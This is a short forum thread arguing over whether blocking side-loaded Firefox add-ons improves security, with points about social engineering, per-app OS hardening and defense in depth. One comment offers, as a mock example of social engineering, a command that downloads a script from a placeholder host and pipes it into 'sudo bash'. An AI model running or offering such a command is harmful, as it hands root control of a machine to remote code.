by mburns 3953 days ago
Just because we existed without them before doesn't mean the restrictions weren't needed.

We always needed Sandboxing and multi-process Firefox, even though we were able to get by without it for years. Likewise, side-loaded add-ons that can steal your information are a legit security threat, even if you think you're such a smart user that you could somehow avoid ever being burned by it.


> side-loaded add-ons that can steal your information are a legit security threat

How so? Sideloading means OS-level access. OS-level access means your whole user account is already compromised if it was malicious software.

There is no additional security gained by preventing side-loading after malicious software already got into your system.

If someone social-engineers you into "install this .xpi" they might as well manage to trick you into "run this .jar" or "run this .exe" or please "curl http://pleaseexploit.me/ | sudo bash" to check out our newest software!

OSes are getting hardened with a per-app security model (instead of the per-account model you describe). Hardening Firefox so that it won't compromise itself through XPIs (which are opaque to the OS) is part of a defense-in-depth strategy. Security policies can prevent applications from scribbling over each other's memory as a general rule, whereas attaching security labels to profile directories requires targeted policies that are much more fragile and full of false positives.